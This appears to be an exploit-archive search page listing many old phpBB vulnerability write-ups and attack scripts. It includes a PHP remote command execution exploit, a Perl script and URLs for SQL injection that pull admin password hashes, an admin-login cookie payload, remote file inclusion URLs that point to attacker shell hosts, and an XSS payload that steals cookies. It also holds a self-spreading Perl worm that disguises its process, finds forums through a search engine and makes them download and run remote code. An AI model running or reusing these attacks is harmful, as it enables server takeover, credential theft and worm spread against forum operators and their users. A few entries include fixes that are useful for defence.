phpBB

Search result for 'phpBB'

Seph1roth/phpbb-permxss.txt ( na)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

PhpBB Xs 2 profile.php Permanent Xss Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#Found By Seph1roth    

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[POST METHOD]

Corrupted page: profile.php?mode=editprofile&cpl_mode=profile_info

Bugged Variable: "selfdes" (the "Altre informazioni" field, i.e. "Other information")

Xss: </textarea>[XSS STRING]


phpBB Xs 2 suffers from a persistent cross site scripting vulnerability in profile.php.

pureone/phpbb2012.txt ( na)

--------------------------------------------------------------------
Written by pureone@spywire.net
--------------------------------------------------------------------
--------------------------------------------------------------------
Exploit : 2.0.x >= phpbb 2.0.12 :
--------------------------------------------------------------------
Let's get on with the show, shall we?
You need Firefox, which is found at http://www.mozilla.org/
You also need the Live HTTP Headers plugin, found at
http://livehttpheaders.mozdev.org/
OK, once installed, find yourself a phpBB forum; I suggest you install one
locally.
You may need http://www.apachefriends.org/en/xampp.html
& http://prdownloads.sourceforge.net/phpbb/phpBB-2.0.12.zip?download

OK, once installed, open your browser at http://127.0.0.1
and open Live HTTP Headers, which is found under Tools.

Look for the packet that says:

GET /phpbb2/index.php HTTP/1.1
Host : localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) 
Gecko/20041107 Firefox/1.0
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 

Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D

Click Replay.
On this line
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
replace the a%3A0%3A%7B%7D with
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

then once again click Replay.
Now you should be able to see the admin control panel,
and you will be logged in as the admin.
Exploited!
--------------------------------------------------------------------
Solution :
-------------------------------------------------------------------
Update to phpBB 2.0.13 or whatever version is out
at the time of reading this.

or

Open includes/sessions.php and find
if( $sessiondata['autologinid'] == $auto_login_key )

and replace it with
if( $sessiondata['autologinid'] === $auto_login_key )

------------------------------------------------------------------------


phpBB versions 2.0.12 and below have a flaw that allows for access to the admin control panel without authorization.

Paisterist/phpbb2013.txt ( na)



/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® - Advisory #08 - 29/02/05
--------------------------------------------------------
Program: phpBB 2.0.13
Homepage: http://www.phpbb.com
Vulnerable Versions: phpBB 2.0.13 & lower versions
Risk: Low Risk
Impact: bbcode, smilies and html badly filtered in usercp_register.php

phpBB 2.0.13 bad filtering in usercp_register.php
---------------------------------------------------------

- Description
---------------------------------------------------------
phpBB is an Open Source project developed by a big community of programmers. It supports a lot of databases, like Oracle, MSSQL, MySQL, PostgreSQL, etc., and is one of the most used prebuilt packages.

- Tested
---------------------------------------------------------
I tested this bug on localhost and on other forums.

- Exploitation
---------------------------------------------------------
The bad code is in the usercp_register.php file. The following part of the code is the vulnerable one:

$allowhtml = ( isset($HTTP_POST_VARS['allowhtml']) ) ? ( ($HTTP_POST_VARS['allowhtml']) ? TRUE : 0 ) : $board_config['allow_html'];
$allowbbcode = ( isset($HTTP_POST_VARS['allowbbcode']) ) ? ( ($HTTP_POST_VARS['allowbbcode']) ? TRUE : 0 ) : $board_config['allow_bbcode'];
$allowsmilies = ( isset($HTTP_POST_VARS['allowsmilies']) ) ? ( ($HTTP_POST_VARS['allowsmilies']) ? TRUE : 0 ) : $board_config['allow_smilies'];

If we specify a variable in the html code (any type: hidden, text, radio, check, etc.) with the name allowhtml, allowbbcode or
allowsmilies, html, bbcode and smilies are going to be enabled in our signature. But this only works for private messages.

In topics our signature is going to be filtered, but not in private messages.

- Exploit
---------------------------------------------------------
1 - Copy the html code of the registration page of the vulnerable forum.

2 - Change the form action to the path of the forum and profile.php. Example: http://phpbb.com/phpBB2/profile.php

3 - Add the variable to enable bbcode, html code or smilies (if they're not enabled) in your private messages. Example:





4 - With your (modified) html registration page you have to register a user with some html code in the signature to test
this bug.

- Solutions
--------------------------------------------------------
At this date there is no update, but we can change the code of the file usercp_register.php:

Vulnerable:

$allowhtml = ( isset($HTTP_POST_VARS['allowhtml']) ) ? ( ($HTTP_POST_VARS['allowhtml']) ? TRUE : 0 ) : $board_config['allow_html'];
$allowbbcode = ( isset($HTTP_POST_VARS['allowbbcode']) ) ? ( ($HTTP_POST_VARS['allowbbcode']) ? TRUE : 0 ) : $board_config['allow_bbcode'];
$allowsmilies = ( isset($HTTP_POST_VARS['allowsmilies']) ) ? ( ($HTTP_POST_VARS['allowsmilies']) ? TRUE : 0 ) : $board_config['allow_smilies'];

Fixed:

// Take the settings from the board configuration only; ignore anything posted by the user
$allowhtml = ( $board_config['allow_html'] ) ? TRUE : 0;
$allowbbcode = ( $board_config['allow_bbcode'] ) ? TRUE : 0;
$allowsmilies = ( $board_config['allow_smilies'] ) ? TRUE : 0;



- References
--------------------------------------------------------
http://neosecurityteam.tk/index.php?pagina=advisories&id=8


- Credits
-------------------------------------------------
Discovered by Paisterist

[N]eo [S]ecurity [T]eam [NST]® - http://neosecurityteam.tk/

Any Question? paisterist.nst[at]gmail[dot]com

Irc.InfoGroup.cl #neosecurityteam

- Greetz
--------------------------------------------------------
Hackzatan
T0wn3r
Crashcool
Daemon21
Merlin
Maxx
Arcanhell

*/


phpBB 2.0.13 fails to properly sanitize some variables in the usercp_register.php script.

Pokleyzz/phpbb.php.txt ( na)

#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (http://www.howdark.com) (1st October 2004)
#
# Requirement:
#
#    PHP 4.x with curl extension;
#
# ** Selamat Hari Raya (Happy Eid) **
*/

if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

if ($argv[2]){
    $url = $argv[1];
    $command = $argv[2];
}
else {
    echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
    echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";
    echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
    echo "\ttopic_id\t topic id\n";
    echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
    exit;
}
if ($argv[3])
    $topic = $argv[3];
else
    $topic = 1;

if ($argv[4])
    $proxy = $argv[4];


$cmd = str2chr($command);

$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";
$ch=curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

function str2chr($str){

    for($i = 0;$i < strlen($str);$i++){
        $chr .= "chr(".ord($str{$i}).")";
        if ($i != strlen($str) -1)
             $chr .= "%252e";    
    }
    return $chr;
}
?>

Remote command execution exploit for phpBB 2.0.10 that makes use of a flaw in the viewtopic.php code.

Zeelock/phpbb2011.txt ( na)

phpBB: all versions vulnerable except 2.0.11
Attachment module: all versions vulnerable

Howdark's update opened my eyes wide with his nice exploit:

Bugtraq id: 10701 

 -----
viewtopic.php?t=1&highlight=%2527
 ----- 

Looking at the code I saw that it was possible to inject any type of SQL query
with multiple char() functions.

The following code can add a username with admin rights by executing this
query:

INSERT INTO 
phpbb_users(user_id,user_active,username,user_password,user_level) VALUES 
('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1') 

A new user with admin rights will be added to phpbb_users.

*Note: we can only execute a working query if we know the table names. If not,
we can't. So this works only with a standard installation (usually 95% of
websites ;-)

username: ze3lock
pass: thepass 

The exploit can be run without being logged in, and then you can get access
with the username. So it's quite simple to make it part of a script that could
make backdoors around the web.

To make it work, just use the id of an existing thread (in this case the
thread is 30; you can see it from the message).


 ------------ Attach Module ---------------- 


In the attach module, I found a directory traversal in the "UPLOAD_DIR"
field.

This is the directory where all attachments are supposed to be uploaded.

The field accepts any kind of character, so you can put '../../' instead of
'files' and all the attachments will be uploaded into the '../../' directory.

That's really dangerous as a defacement threat.


 --------------- Suggestion ------------------ 

Please upgrade to version 2.0.11 and add input validation to the UPLOAD_DIR
field in the attach module.

Zeelock 



phpBB versions below 2.0.11 suffer from additional SQL injection and directory traversal flaws.

KorsaN/Phpbb-insert.txt ( na)

$ BiyoSecurity.Org & SecurityWall.Org

$ Script Name : Phpbb insert module

$ versions : 0.1.0 and 0.1.1

$ Risk : High

$ Regard : KorsaN

$ Thanks : Liz0zim , RMx , TR_IP , DreamLord , Kubra

$ Vulnerable File : functions_mod_user.php

$ Vulnerable code : 

<-- code start -->


include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);
include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);
include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);


$ Exploit : 

www.victim.com/[path]/functions_mod_user.php?phpbb_root_path=http://hacker.com/shell.txt?&cmd=ls


The phpBB insert module versions 0.1.0 and 0.1.1 suffer from a remote file inclusion vulnerability in functions_mod_user.php.

xoron/Phpbb Tweaked <= 3 (phpbb_root_path) Remote Inclusion Vulnerability ( php)

-----------------------------------------------

Phpbb Tweaked (phpbb_root_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz - xoron.info

-----------------------------------------------

Code:
include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

-----------------------------------------------

POC:

www.[target].com/[script_pat]/includes/functions.php?phpbb_root_path=http://evilscripts?

-----------------------------------------------

Exploit:

www.xoron.info/bugs/phpbbtweaked.txt

-----------------------------------------------

download: http://sourceforge.net/projects/phpbbtweaked/

-----------------------------------------------

Thanks: pang0, chaos, can bjorn
Thanx: str0ke, kacper
 
-----------------------------------------------

xoron goes, his trace remains; farewell.

xoron, a kid addicted to losing.

We wrote our name in golden letters.

-----------------------------------------------

# milw0rm.com [2007-01-31]


Canberx/phpbb2include.txt ( na)

********************************************************************
*Title:
*phpBB2 Remote File Include
*
*
*Credit:
*Canberx
*
*
*Thanx:
*Forewer-Partizan
*
*
*Mail:
*canberx@linuxmail.org    www.canberx.tk
*
*
*Google Dork:
*Powered by phpBB © 2001, 2002 phpBB Group
*
*
*Exploit:
*www.target.com/[path_to_phpbb]/template.php?page=[attacker]
*
*
*********************************************************************

Please don't hack a site if it has already been defaced :)

*********************************************************************


phpBB2 suffers from a remote file inclusion flaw.

XORON/phpbbViewed10.txt ( na)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

phpBB User Viewed Posts Tracker Version <= 1.0 [phpbb_root_path] File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by XORON (Turkish hacker)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL: http://www.nivisec.com/downloads/phpbb/user_viewed_posts.zip

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Vuln. Code: include_once($phpbb_root_path . 'language/lang_' .
$board_config['default_lang'] . '/lang_user_viewed_posts.' . $phpEx);

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:
/includes/functions_user_viewed_posts.php?phpbb_root_path=http://SH3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2006-10-06]



phpBB User Viewed Posts Tracker versions 1.0 and below suffer from a remote file inclusion vulnerability in phpbb_root_path.

NBBN/phpbb2023-hijack.txt ( na)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
phpBB 2.0.23 Session Hijacking Vulnerability                +
found by NBBN                 13 Mar 2008                   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++                  



::Information about this vulnerability
If a moderator or an admin closes a thread in phpBB 2.0.X, the session id
is sent via GET:

http://site.tld/phpBB2/modcp.php?t=1&mode=lock&sid=[session]

The admin/moderator is going to be redirected to the thread (with the
session). If an attacker has posted an image in his post, he can see the
referer and so the session id. And if the attacker has a good day and
the admin closes the thread, he can use all admin functions with CSRF.


::Fix

No fix

::Workaround

Upgrade to phpBB3

::Tested under:

phpBB 2.0.23 (localhost)


phpBB version 2.0.23 suffers from a session hijacking vulnerability.

Maksymilian Arciemowicz/phpBB2018.txt ( na)


[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM

--- 0. Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source 
bulletin board package. phpBB has a user-friendly interface, simple and 
straightforward administration panel, and helpful FAQ. Based on the powerful 
PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or 
Access/ODBC database servers, phpBB is the ideal free community solution for 
all web sites.
Contact with author http://www.phpbb.com/about.php.

--- 1. XSS ---
If in phpBB "Allowed HTML tags" is ON for tags like b, i, u, pre, and you have
"Always allow HTML: YES" in your profile or you are a Guest,

then you can use these tags:

<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B>

Exploit:

<B C=">" 
onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" 
X="<B "> H A L O </B>

and you have the cookies.

--- 2. Full Path Disclosure ---
In the file admin/admin_disallow.php there is:

--25-31---
if( !empty($setmodules) )
{
  $filename = basename(__FILE__);
  $module['Users']['Disallow'] = append_sid($filename);

  return;
}
--25-31---

The function append_sid() doesn't exist. And if you have:

register_globals = On
display_errors = On

Try going to:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

--RESULT ERROR---
Fatal error: Call to undefined function: append_sid() 
in /www/2018/phpBB2/admin/admin_disallow.php on line 28
--RESULT ERROR---

--- 3. Greets ---
sp3x

--- 4. Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM


phpBB 2.0.18 is susceptible to cross site scripting and path disclosure issues.

priv8crew/phpbb.ssh.D.txt ( na)

#/usr/bin/perl

################################################################################
#  ------------------------------------------------------------------------    #
#  Severino Honorato - /server irc.priv8crew.info #Priv8crew - ssh.D.Worm      #
#                                                                              #
################################################################################


use IO::Socket;
use LWP::Simple;
my $processo = "/usr/local/apache/bin/httpd -DSSL";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";

$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

while(1){
@vul = "";
$a=0;
$numero = int rand(999);
$procura = "topic.php?t=$numero";

######################################
for($n=0;$n<1111;$n += 10){

  @cade = get("http://www.altavista.com/web/results?itag=wrx&amp;q=$procura&amp;kgs=1&amp;kls=0&amp;stq=$n") or next;
  $ae = "@cade";
  #print $ae;
  while ($ae=~ m/<a class=\'res\' href=\'.*?\'>/){
    $ae=~ s/<a class=\'res\' href=\'(.*?)\'>/$1/;
    $uber=$1;

    $uber =~ s/ //g;
    $uber =~ s/<b>//g;
    $uber =~ s/<\/b>//g;
    $uber =~ s/<wbr>//g;

    if ($uber =~/&amp;/){
      $nu = index $uber, '&amp;';
      $uber = substr($uber,0,$nu);
    }
    $vul[$a] = $uber;
    $a++
  }
}

#########################


$cmd = "&amp;rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd /tmp;wget 
atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl 
sess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl 
sess_189f0f0889555397a4de5485dd611111;rm 
sess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&amp;highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';";

$b = scalar(@vul);

for($a=0;$a<=$b;$a++)
{
$sitevul = $vul[$a] . $cmd;
if($sitevul !~/http/){ $sitevul = 'http://' . $sitevul; }

$teste1 = get($sitevul) or next;
$teste1 = "";
}
}


New version of the phpBB worm with bot install that makes use of Altavista.

XORON/phpbb2-rfi.txt ( na)

-----------------------------------------------

phpBB2 MODificat (phpbb_root_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz

-----------------------------------------------

Code:
include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );
-----------------------------------------------

POC:

www.[target].com/[script_pat]/includes/functions.php?phpbb_root_path=http://evilscripts?

-----------------------------------------------

download: http://sourceforge.net/project/showfiles.php?group_id=110366

-----------------------------------------------

Thanks: pang0, chaos, can bjorn

Thanx: str0ke, kacper

xoron goes, his trace remains; farewell.

xoron, a kid addicted to losing.

We wrote our name in golden letters.

-----------------------------------------------


phpBB2 MODificat versions 0.2.0 and below suffer from a remote file inclusion vulnerability.

[R]/phpbb2013SQL.txt ( na)

Here's an update of the paper:

phpBB 2.0.13 <= downloads.php Mod SQL injection

[ www.batznet.com ]

##############################################

Discussion:
--------------------
This exploit makes it possible to insert SQL Code through downloads.php


Bug:
--------------------
http://www.phpbb.de/downloads.php?cat=batz

Spits out an error msg:

Could not query downloads

DEBUG MODE

SQL Error : 1054 Unknown column 'leet' in 'where clause'

SELECT * FROM phpbb2_downloads where cat=leet ORDER by sort

Line : 106
File : downloads.php



Exploit:
--------------------
/downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FRO
M%20phpbb_users%20WHERE%20user_id=2/*

This gives the MD5 hash from UID 2!


Patch:
-------------------
Don't use this Mod. :)


Greetz:
-------------------
Greetz fly out to R_Q, darkkilla, Madinfect, EaTh, kr3mliyn


// written by [R]
// 02.04.2005






The downloads.php mod in phpBB versions 2.0.13 and below is susceptible to SQL injection attacks.

Axl/cal_phpbb.pl.txt ( na)

#!/usr/bin/perl -w
use IO::Socket;

##    Example:
##    C:\>cal_phpbb.pl www.site.com /phpBB2/ 2
##
##    'Calendar Pro' Mod for phpBB
##    *************************
##      [~] Connecting...
##      [+] Connected!
##      [~] Sending Data...
##      [~] Data Sent, Waiting for response...
##      [+] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
##
if (@ARGV < 3)
{
print "\n\n";
print "|****************************************************************|\n";
print " 'Calendar Pro' Mod <= 2.0.33 (Newest version) For phpBB\n";
print " Bug found by Axl\n";
print " Coded by CereBrums // 4/4/2005\n";
print " Usage: cal_phpbb.pl <server> <folder> <user_id>\n";
print " e.g.: cal_phpbb.pl www.site.com /phpBB2/ 2 \n";
print " [~] <server> - site address\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 is default for phpBB admin) \n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}

$take = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "\n 'Calendar Pro' Mod for phpBB\n";
print " *****************************\n";
print "  [~] Connecting...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";

print "  [+] Connected!\n";
print "  [~] Sending Data...\n";

$path = "http://$server/";
$path .= "/$folder/";
$path .= "cal_view_month.php?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id=$user_id/*";
print $socket "GET $path HTTP/1.0\r\n\r\n";

print "  [~] Data Sent, Waiting for response...\n";

while ($answer = <$socket>)
{
       if ($take == 1) {
               $in = rindex ($answer, "(");
               if ( $in > -1 ) {
                       $pass = substr($answer,$in+1,32);
                       print "  [+] MD5 Hash for user with id=$user_id is: $pass\n";
                       exit();
               }
       }
       if ( rindex ($answer,"cal_view_month.php?month=3&amp;year=2005") > -1 ) {
               $take = 1;
       }
}
print "  [-] Exploit failed\n";


phpBB versions 2.0.13 and below Calendar Pro module exploit that retrieves a user's MD5 hash.